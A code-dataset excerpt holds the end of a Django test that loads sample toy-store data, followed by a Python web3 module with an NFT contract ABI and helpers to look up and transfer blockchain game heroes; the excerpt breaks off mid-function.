'Fun4All', '1 Sunny Place', 'Muncie', 'IN', '42222', 'USA', 'Jim Jones', '[email protected]');") cursor.execute("INSERT INTO Customers(cust_id, cust_name, cust_address, cust_city, cust_state, cust_zip, cust_country, cust_contact, cust_email) \ VALUES('1000000004', 'Fun4All', '829 Riverside Drive', 'Phoenix', 'AZ', '88888', 'USA', 'Denise L. Stephens', '[email protected]');") cursor.execute("INSERT INTO Customers(cust_id, cust_name, cust_address, cust_city, cust_state, cust_zip, cust_country, cust_contact) \ VALUES('1000000005', 'The Toy Store', '4545 53rd Street', 'Chicago', 'IL', '54545', 'USA', 'Kim Howard');") # Populate Vendors table cursor.execute("INSERT INTO Vendors(vend_id, vend_name, vend_address, vend_city, vend_state, vend_zip, vend_country) \ VALUES('BRS01','Bears R Us','123 Main Street','Bear Town','MI','44444', 'USA');") cursor.execute("INSERT INTO Vendors(vend_id, vend_name, vend_address, vend_city, vend_state, vend_zip, vend_country) \ VALUES('BRE02','Bear Emporium','500 Park Street','Anytown','OH','44333', 'USA');") cursor.execute("INSERT INTO Vendors(vend_id, vend_name, vend_address, vend_city, vend_state, vend_zip, vend_country) \ VALUES('DLL01','Doll House Inc.','555 High Street','Dollsville','CA','99999', 'USA');") cursor.execute("INSERT INTO Vendors(vend_id, vend_name, vend_address, vend_city, vend_state, vend_zip, vend_country) \ VALUES('FRB01','Furball Inc.','1000 5th Avenue','New York','NY','11111', 'USA');") cursor.execute("INSERT INTO Vendors(vend_id, vend_name, vend_address, vend_city, vend_state, vend_zip, vend_country) \ VALUES('FNG01','Fun and Games','42 Galaxy Road','London', NULL,'N16 6PS', 'England');") cursor.execute("INSERT INTO Vendors(vend_id, vend_name, vend_address, vend_city, vend_state, vend_zip, vend_country) \ VALUES('JTS01','Jouets et ours','1 Rue Amusement','Paris', NULL,'45678', 'France');") # Populate Products table cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \ VALUES('BR01', 'BRS01', '8 inch teddy bear', 5.99, '8 inch teddy bear, comes with cap and jacket');") cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \ VALUES('BR02', 'BRS01', '12 inch teddy bear', 8.99, '12 inch teddy bear, comes with cap and jacket');") cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \ VALUES('BR03', 'BRS01', '18 inch teddy bear', 11.99, '18 inch teddy bear, comes with cap and jacket');") cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \ VALUES('BNBG01', 'DLL01', 'Fish bean bag toy', 3.49, 'Fish bean bag toy, complete with bean bag worms with which to feed it');") cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \ VALUES('BNBG02', 'DLL01', 'Bird bean bag toy', 3.49, 'Bird bean bag toy, eggs are not included');") cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \ VALUES('BNBG03', 'DLL01', 'Rabbit bean bag toy', 3.49, 'Rabbit bean bag toy, comes with bean bag carrots');") cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \ VALUES('RGAN01', 'DLL01', 'Raggedy Ann', 4.99, '18 inch Raggedy Ann doll');") cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \ VALUES('RYL01', 'FNG01', 'King doll', 9.49, '12 inch king doll with royal garments and crown');") cursor.execute("INSERT INTO Products(prod_id, vend_id, prod_name, prod_price, prod_desc) \ VALUES('RYL02', 'FNG01', 'Queen doll', 9.49, '12 inch queen doll with royal garments and crown');") # Populate Orders table cursor.execute("INSERT INTO Orders(order_num, order_date, cust_id) \ VALUES(20005, '2020-05-01', '1000000001');") cursor.execute("INSERT INTO Orders(order_num, order_date, cust_id) \ VALUES(20006, '2020-01-12', '1000000003');") cursor.execute("INSERT INTO Orders(order_num, order_date, cust_id) \ VALUES(20007, '2020-01-30', '1000000004');") cursor.execute("INSERT INTO Orders(order_num, order_date, cust_id) \ VALUES(20008, '2020-02-03', '1000000005');") cursor.execute("INSERT INTO Orders(order_num, order_date, cust_id) \ VALUES(20009, '2020-02-08', '1000000001');") # Populate OrderItems table cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \ VALUES(20005, 1, 'BR01', 100, 5.49);") cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \ VALUES(20005, 2, 'BR03', 100, 10.99);") cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \ VALUES(20006, 1, 'BR01', 20, 5.99);") cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \ VALUES(20006, 2, 'BR02', 10, 8.99);") cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \ VALUES(20006, 3, 'BR03', 10, 11.99);") cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \ VALUES(20007, 1, 'BR03', 50, 11.49);") cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \ VALUES(20007, 2, 'BNBG01', 100, 2.99);") cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \ VALUES(20007, 3, 'BNBG02', 100, 2.99);") cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \ VALUES(20007, 4, 'BNBG03', 100, 2.99);") cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \ VALUES(20007, 5, 'RGAN01', 50, 4.49);") cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \ VALUES(20008, 1, 'RGAN01', 5, 4.99);") cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \ VALUES(20008, 2, 'BR03', 5, 11.99);") cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \ VALUES(20008, 3, 'BNBG01', 10, 3.49);") cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \ VALUES(20008, 4, 'BNBG02', 10, 3.49);") cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \ VALUES(20008, 5, 'BNBG03', 10, 3.49);") cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \ VALUES(20009, 1, 'BNBG01', 250, 2.49);") cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \ VALUES(20009, 2, 'BNBG02', 250, 2.49);") cursor.execute("INSERT INTO OrderItems(order_num, order_item, prod_id, quantity, item_price) \ VALUES(20009, 3, 'BNBG03', 250, 2.49);") def tearDown(self): # Clean up run after every test method. Customers.objects.all().delete() Vendors.objects.all().delete() Orders.objects.all().delete() OrderItems.objects.all().delete() Products.objects.all().delete() def test_customers(self): for i in Customers.objects.all(): print(i.to_dict()) for i in Vendors.objects.all(): print(i.to_dict()) for i in Orders.objects.all(): print(i.to_dict()) for i in OrderItems.objects.all(): print(i.to_dict()) for i in Products.objects.all(): print(i.to_dict())
[((16, 17, 16, 36), 'django.db.connection.cursor', 'connection.cursor', ({}, {}), '()', False, 'from django.db import connection\n')]
tmfds/dfk
hero/hero.py
91b6f95a4630b57deecf87cf4850b6576646c7d1
import copy from web3 import Web3 from .utils import utils as hero_utils CONTRACT_ADDRESS = '0x5f753dcdf9b1ad9aabc1346614d1f4746fd6ce5c' ABI = """ [ {"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"}, {"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"}, {"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":false,"internalType":"uint256","name":"heroId","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"summonerId","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"assistantId","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"statGenes","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"visualGenes","type":"uint256"}],"name":"HeroSummoned","type":"event"}, {"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"account","type":"address"}],"name":"Paused","type":"event"}, {"anonymous":false,"inputs":[{"indexed":true,"internalType":"bytes32","name":"role","type":"bytes32"},{"indexed":true,"internalType":"bytes32","name":"previousAdminRole","type":"bytes32"},{"indexed":true,"internalType":"bytes32","name":"newAdminRole","type":"bytes32"}],"name":"RoleAdminChanged","type":"event"}, {"anonymous":false,"inputs":[{"indexed":true,"internalType":"bytes32","name":"role","type":"bytes32"},{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":true,"internalType":"address","name":"sender","type":"address"}],"name":"RoleGranted","type":"event"}, {"anonymous":false,"inputs":[{"indexed":true,"internalType":"bytes32","name":"role","type":"bytes32"},{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":true,"internalType":"address","name":"sender","type":"address"}],"name":"RoleRevoked","type":"event"}, {"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"}, {"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"account","type":"address"}],"name":"Unpaused","type":"event"}, {"inputs":[],"name":"DEFAULT_ADMIN_ROLE","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"}, {"inputs":[],"name":"HERO_MODERATOR_ROLE","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"}, {"inputs":[],"name":"MINTER_ROLE","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"}, {"inputs":[],"name":"MODERATOR_ROLE","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"}, {"inputs":[],"name":"PAUSER_ROLE","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"}, {"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"}, {"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"}, {"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"}, {"inputs":[{"internalType":"uint256","name":"_statGenes","type":"uint256"},{"internalType":"uint256","name":"_visualGenes","type":"uint256"}, {"internalType":"enum IHeroTypes.Rarity","name":"_rarity","type":"uint8"}, {"internalType":"bool","name":"_shiny","type":"bool"},{"components":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"uint256","name":"summonerId","type":"uint256"},{"internalType":"uint256","name":"assistantId","type":"uint256"},{"internalType":"uint16","name":"generation","type":"uint16"},{"internalType":"uint256","name":"createdBlock","type":"uint256"},{"internalType":"uint256","name":"heroId","type":"uint256"},{"internalType":"uint8","name":"summonerTears","type":"uint8"},{"internalType":"uint8","name":"assistantTears","type":"uint8"},{"internalType":"address","name":"bonusItem","type":"address"},{"internalType":"uint32","name":"maxSummons","type":"uint32"},{"internalType":"uint32","name":"firstName","type":"uint32"},{"internalType":"uint32","name":"lastName","type":"uint32"},{"internalType":"uint8","name":"shinyStyle","type":"uint8"}],"internalType":"struct ICrystalTypes.HeroCrystal","name":"_crystal","type":"tuple"}],"name":"createHero","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"nonpayable","type":"function"}, {"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}, {"inputs":[{"internalType":"uint256","name":"_id","type":"uint256"}],"name":"getHero","outputs":[{"components":[{"internalType":"uint256","name":"id","type":"uint256"},{"components":[{"internalType":"uint256","name":"summonedTime","type":"uint256"},{"internalType":"uint256","name":"nextSummonTime","type":"uint256"},{"internalType":"uint256","name":"summonerId","type":"uint256"},{"internalType":"uint256","name":"assistantId","type":"uint256"},{"internalType":"uint32","name":"summons","type":"uint32"},{"internalType":"uint32","name":"maxSummons","type":"uint32"}],"internalType":"struct IHeroTypes.SummoningInfo","name":"summoningInfo","type":"tuple"},{"components":[{"internalType":"uint256","name":"statGenes","type":"uint256"},{"internalType":"uint256","name":"visualGenes","type":"uint256"},{"internalType":"enum IHeroTypes.Rarity","name":"rarity","type":"uint8"},{"internalType":"bool","name":"shiny","type":"bool"},{"internalType":"uint16","name":"generation","type":"uint16"},{"internalType":"uint32","name":"firstName","type":"uint32"},{"internalType":"uint32","name":"lastName","type":"uint32"},{"internalType":"uint8","name":"shinyStyle","type":"uint8"},{"internalType":"uint8","name":"class","type":"uint8"},{"internalType":"uint8","name":"subClass","type":"uint8"}],"internalType":"struct IHeroTypes.HeroInfo","name":"info","type":"tuple"},{"components":[{"internalType":"uint256","name":"staminaFullAt","type":"uint256"},{"internalType":"uint256","name":"hpFullAt","type":"uint256"},{"internalType":"uint256","name":"mpFullAt","type":"uint256"},{"internalType":"uint16","name":"level","type":"uint16"},{"internalType":"uint64","name":"xp","type":"uint64"},{"internalType":"address","name":"currentQuest","type":"address"},{"internalType":"uint8","name":"sp","type":"uint8"},{"internalType":"enum IHeroTypes.HeroStatus","name":"status","type":"uint8"}],"internalType":"struct IHeroTypes.HeroState","name":"state","type":"tuple"},{"components":[{"internalType":"uint16","name":"strength","type":"uint16"},{"internalType":"uint16","name":"intelligence","type":"uint16"},{"internalType":"uint16","name":"wisdom","type":"uint16"},{"internalType":"uint16","name":"luck","type":"uint16"},{"internalType":"uint16","name":"agility","type":"uint16"},{"internalType":"uint16","name":"vitality","type":"uint16"},{"internalType":"uint16","name":"endurance","type":"uint16"},{"internalType":"uint16","name":"dexterity","type":"uint16"},{"internalType":"uint16","name":"hp","type":"uint16"},{"internalType":"uint16","name":"mp","type":"uint16"},{"internalType":"uint16","name":"stamina","type":"uint16"}],"internalType":"struct IHeroTypes.HeroStats","name":"stats","type":"tuple"},{"components":[{"internalType":"uint16","name":"strength","type":"uint16"},{"internalType":"uint16","name":"intelligence","type":"uint16"},{"internalType":"uint16","name":"wisdom","type":"uint16"},{"internalType":"uint16","name":"luck","type":"uint16"},{"internalType":"uint16","name":"agility","type":"uint16"},{"internalType":"uint16","name":"vitality","type":"uint16"},{"internalType":"uint16","name":"endurance","type":"uint16"},{"internalType":"uint16","name":"dexterity","type":"uint16"},{"internalType":"uint16","name":"hpSm","type":"uint16"},{"internalType":"uint16","name":"hpRg","type":"uint16"},{"internalType":"uint16","name":"hpLg","type":"uint16"},{"internalType":"uint16","name":"mpSm","type":"uint16"},{"internalType":"uint16","name":"mpRg","type":"uint16"},{"internalType":"uint16","name":"mpLg","type":"uint16"}],"internalType":"struct IHeroTypes.HeroStatGrowth","name":"primaryStatGrowth","type":"tuple"},{"components":[{"internalType":"uint16","name":"strength","type":"uint16"},{"internalType":"uint16","name":"intelligence","type":"uint16"},{"internalType":"uint16","name":"wisdom","type":"uint16"},{"internalType":"uint16","name":"luck","type":"uint16"},{"internalType":"uint16","name":"agility","type":"uint16"},{"internalType":"uint16","name":"vitality","type":"uint16"},{"internalType":"uint16","name":"endurance","type":"uint16"},{"internalType":"uint16","name":"dexterity","type":"uint16"},{"internalType":"uint16","name":"hpSm","type":"uint16"},{"internalType":"uint16","name":"hpRg","type":"uint16"},{"internalType":"uint16","name":"hpLg","type":"uint16"},{"internalType":"uint16","name":"mpSm","type":"uint16"},{"internalType":"uint16","name":"mpRg","type":"uint16"},{"internalType":"uint16","name":"mpLg","type":"uint16"}],"internalType":"struct IHeroTypes.HeroStatGrowth","name":"secondaryStatGrowth","type":"tuple"},{"components":[{"internalType":"uint16","name":"mining","type":"uint16"},{"internalType":"uint16","name":"gardening","type":"uint16"},{"internalType":"uint16","name":"foraging","type":"uint16"},{"internalType":"uint16","name":"fishing","type":"uint16"}],"internalType":"struct IHeroTypes.HeroProfessions","name":"professions","type":"tuple"}],"internalType":"struct IHeroTypes.Hero","name":"","type":"tuple"}],"stateMutability":"view","type":"function"}, {"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"}],"name":"getRoleAdmin","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"}, {"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"uint256","name":"index","type":"uint256"}],"name":"getRoleMember","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}, {"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"}],"name":"getRoleMemberCount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"}, {"inputs":[{"internalType":"address","name":"_address","type":"address"}],"name":"getUserHeroes","outputs":[{"internalType":"uint256[]","name":"","type":"uint256[]"}],"stateMutability":"view","type":"function"}, {"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"grantRole","outputs":[],"stateMutability":"nonpayable","type":"function"}, {"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"hasRole","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"}, {"inputs":[{"internalType":"string","name":"_name","type":"string"},{"internalType":"string","name":"_symbol","type":"string"},{"internalType":"string","name":"_url","type":"string"},{"internalType":"address","name":"_statScienceAddress","type":"address"}],"name":"initialize","outputs":[],"stateMutability":"nonpayable","type":"function"}, {"inputs":[{"internalType":"string","name":"name","type":"string"},{"internalType":"string","name":"symbol","type":"string"},{"internalType":"string","name":"baseTokenURI","type":"string"}],"name":"initialize","outputs":[],"stateMutability":"nonpayable","type":"function"}, {"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"}, {"inputs":[{"internalType":"address","name":"to","type":"address"}],"name":"mint","outputs":[],"stateMutability":"nonpayable","type":"function"}, {"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"}, {"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}, {"inputs":[],"name":"pause","outputs":[],"stateMutability":"nonpayable","type":"function"}, {"inputs":[],"name":"paused","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"}, {"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"renounceRole","outputs":[],"stateMutability":"nonpayable","type":"function"}, {"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"revokeRole","outputs":[],"stateMutability":"nonpayable","type":"function"}, {"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"}, {"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"_data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"}, {"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"}, {"inputs":[{"internalType":"address","name":"_statScienceAddress","type":"address"}],"name":"setStatScienceAddress","outputs":[],"stateMutability":"nonpayable","type":"function"}, {"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"}, {"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenOfOwnerByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"}, {"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"}, {"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"}, {"inputs":[],"name":"unpause","outputs":[],"stateMutability":"nonpayable","type":"function"}, {"inputs":[{"components":[{"internalType":"uint256","name":"id","type":"uint256"},{"components":[{"internalType":"uint256","name":"summonedTime","type":"uint256"},{"internalType":"uint256","name":"nextSummonTime","type":"uint256"},{"internalType":"uint256","name":"summonerId","type":"uint256"},{"internalType":"uint256","name":"assistantId","type":"uint256"},{"internalType":"uint32","name":"summons","type":"uint32"},{"internalType":"uint32","name":"maxSummons","type":"uint32"}],"internalType":"struct IHeroTypes.SummoningInfo","name":"summoningInfo","type":"tuple"},{"components":[{"internalType":"uint256","name":"statGenes","type":"uint256"},{"internalType":"uint256","name":"visualGenes","type":"uint256"},{"internalType":"enum IHeroTypes.Rarity","name":"rarity","type":"uint8"},{"internalType":"bool","name":"shiny","type":"bool"},{"internalType":"uint16","name":"generation","type":"uint16"},{"internalType":"uint32","name":"firstName","type":"uint32"},{"internalType":"uint32","name":"lastName","type":"uint32"},{"internalType":"uint8","name":"shinyStyle","type":"uint8"},{"internalType":"uint8","name":"class","type":"uint8"},{"internalType":"uint8","name":"subClass","type":"uint8"}],"internalType":"struct IHeroTypes.HeroInfo","name":"info","type":"tuple"},{"components":[{"internalType":"uint256","name":"staminaFullAt","type":"uint256"},{"internalType":"uint256","name":"hpFullAt","type":"uint256"},{"internalType":"uint256","name":"mpFullAt","type":"uint256"},{"internalType":"uint16","name":"level","type":"uint16"},{"internalType":"uint64","name":"xp","type":"uint64"},{"internalType":"address","name":"currentQuest","type":"address"},{"internalType":"uint8","name":"sp","type":"uint8"},{"internalType":"enum IHeroTypes.HeroStatus","name":"status","type":"uint8"}],"internalType":"struct IHeroTypes.HeroState","name":"state","type":"tuple"},{"components":[{"internalType":"uint16","name":"strength","type":"uint16"},{"internalType":"uint16","name":"intelligence","type":"uint16"},{"internalType":"uint16","name":"wisdom","type":"uint16"},{"internalType":"uint16","name":"luck","type":"uint16"},{"internalType":"uint16","name":"agility","type":"uint16"},{"internalType":"uint16","name":"vitality","type":"uint16"},{"internalType":"uint16","name":"endurance","type":"uint16"},{"internalType":"uint16","name":"dexterity","type":"uint16"},{"internalType":"uint16","name":"hp","type":"uint16"},{"internalType":"uint16","name":"mp","type":"uint16"},{"internalType":"uint16","name":"stamina","type":"uint16"}],"internalType":"struct IHeroTypes.HeroStats","name":"stats","type":"tuple"},{"components":[{"internalType":"uint16","name":"strength","type":"uint16"},{"internalType":"uint16","name":"intelligence","type":"uint16"},{"internalType":"uint16","name":"wisdom","type":"uint16"},{"internalType":"uint16","name":"luck","type":"uint16"},{"internalType":"uint16","name":"agility","type":"uint16"},{"internalType":"uint16","name":"vitality","type":"uint16"},{"internalType":"uint16","name":"endurance","type":"uint16"},{"internalType":"uint16","name":"dexterity","type":"uint16"},{"internalType":"uint16","name":"hpSm","type":"uint16"},{"internalType":"uint16","name":"hpRg","type":"uint16"},{"internalType":"uint16","name":"hpLg","type":"uint16"},{"internalType":"uint16","name":"mpSm","type":"uint16"},{"internalType":"uint16","name":"mpRg","type":"uint16"},{"internalType":"uint16","name":"mpLg","type":"uint16"}],"internalType":"struct IHeroTypes.HeroStatGrowth","name":"primaryStatGrowth","type":"tuple"},{"components":[{"internalType":"uint16","name":"strength","type":"uint16"},{"internalType":"uint16","name":"intelligence","type":"uint16"},{"internalType":"uint16","name":"wisdom","type":"uint16"},{"internalType":"uint16","name":"luck","type":"uint16"},{"internalType":"uint16","name":"agility","type":"uint16"},{"internalType":"uint16","name":"vitality","type":"uint16"},{"internalType":"uint16","name":"endurance","type":"uint16"},{"internalType":"uint16","name":"dexterity","type":"uint16"},{"internalType":"uint16","name":"hpSm","type":"uint16"},{"internalType":"uint16","name":"hpRg","type":"uint16"},{"internalType":"uint16","name":"hpLg","type":"uint16"},{"internalType":"uint16","name":"mpSm","type":"uint16"},{"internalType":"uint16","name":"mpRg","type":"uint16"},{"internalType":"uint16","name":"mpLg","type":"uint16"}],"internalType":"struct IHeroTypes.HeroStatGrowth","name":"secondaryStatGrowth","type":"tuple"},{"components":[{"internalType":"uint16","name":"mining","type":"uint16"},{"internalType":"uint16","name":"gardening","type":"uint16"},{"internalType":"uint16","name":"foraging","type":"uint16"},{"internalType":"uint16","name":"fishing","type":"uint16"}],"internalType":"struct IHeroTypes.HeroProfessions","name":"professions","type":"tuple"}],"internalType":"struct IHeroTypes.Hero","name":"_hero","type":"tuple"}],"name":"updateHero","outputs":[],"stateMutability":"nonpayable","type":"function"}, {"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"uint256","name":"","type":"uint256"}],"name":"userHeroes","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"} ] """ def block_explorer_link(txid): return 'https://explorer.harmony.one/tx/' + str(txid) def transfer(hero_id, owner_private_key, owner_nonce, receiver_address, gas_price_gwei, rpc_address, logger): w3 = Web3(Web3.HTTPProvider(rpc_address)) account = w3.eth.account.privateKeyToAccount(owner_private_key) w3.eth.default_account = account.address contract_address = Web3.toChecksumAddress(CONTRACT_ADDRESS) contract = w3.eth.contract(contract_address, abi=ABI) owner = contract.functions.ownerOf(hero_id).call() logger.info("Hero's owner " + str(owner)) if owner != account.address: raise Exception("Owner mismatch") tx = contract.functions.transferFrom(owner, receiver_address, hero_id).buildTransaction( {'gasPrice': w3.toWei(gas_price_gwei, 'gwei'), 'nonce': owner_nonce}) logger.debug("Signing transaction") signed_tx = w3.eth.account.sign_transaction(tx, private_key=owner_private_key) logger.debug("Sending transaction " + str(tx)) ret = w3.eth.send_raw_transaction(signed_tx.rawTransaction) logger.debug("Transaction successfully sent !") logger.info("Waiting for transaction " + block_explorer_link(signed_tx.hash.hex()) + " to be mined") tx_receipt = w3.eth.wait_for_transaction_receipt(transaction_hash=signed_tx.hash, timeout=24 * 3600, poll_latency=3) logger.info("Transaction mined !") logger.info(str(tx_receipt)) def get_owner(hero_id, rpc_address): w3 = Web3(Web3.HTTPProvider(rpc_address)) contract_address = Web3.toChecksumAddress(CONTRACT_ADDRESS) contract = w3.eth.contract(contract_address, abi=ABI) return str(contract.functions.ownerOf(hero_id).call()) def get_users_heroes(user_address, rpc_address): w3 = Web3(Web3.HTTPProvider(rpc_address)) contract_address = Web3.toChecksumAddress(CONTRACT_ADDRESS) contract = w3.eth.contract(contract_address, abi=ABI) return contract.functions.getUserHeroes(Web3.toChecksumAddress(user_address)).call() def is_approved_for_all(owner, operator, rpc_address): w3 = Web3(Web3.HTTPProvider(rpc_address)) contract_address = Web3.toChecksumAddress(CONTRACT_ADDRESS) contract = w3.eth.contract(contract_address, abi=ABI) return contract.functions.isApprovedForAll(Web3.toChecksumAddress(owner), Web3.toChecksumAddress(operator)).call() def get_hero(hero_id, rpc_address): w3 = Web3(Web3.HTTPProvider(rpc_address)) contract_address = Web3.toChecksumAddress(CONTRACT_ADDRESS) contract = w3.eth.contract(contract_address, abi=ABI) contract_entry = contract.functions.getHero(hero_id).call() hero = {} tuple_index = 0 hero['id'] = contract_entry[tuple_index] tuple_index = tuple_index + 1 # SummoningInfo summoning_info = {} summoning_info['summonedTime'] = contract_entry[tuple_index][0] summoning_info['nextSummonTime'] = contract_entry[tuple_index][1] summoning_info['summonerId'] = contract_entry[tuple_index][2] summoning_info['assistantId'] = contract_entry[tuple_index][3] summoning_info['summons'] = contract_entry[tuple_index][4] summoning_info['maxSummons'] = contract_entry[tuple_index][5] hero['summoningInfo'] = summoning_info tuple_index = tuple_index + 1 # HeroInfo hero_info = {} hero_info['statGenes'] = contract_entry[tuple_index][0] hero_info['visualGenes'] = contract_entry[tuple_index][1] hero_info['rarity'] = contract_entry[tuple_index][2] hero_info['shiny'] = contract_entry[tuple_index][3] hero_info['generation'] = contract_entry[tuple_index][4] hero_info['firstName'] = contract_entry[tuple_index][5] hero_info['lastName'] = contract_entry[tuple_index][6] hero_info['shinyStyle'] = contract_entry[tuple_index][7] hero_info['class'] = contract_entry[tuple_index][8] hero_info['subClass'] = contract_entry[tuple_index][9] hero['info'] = hero_info tuple_index = tuple_index + 1 # HeroState hero_state = {} hero_state['staminaFullAt'] = contract_entry[tuple_index][0] hero_state['hpFullAt'] = 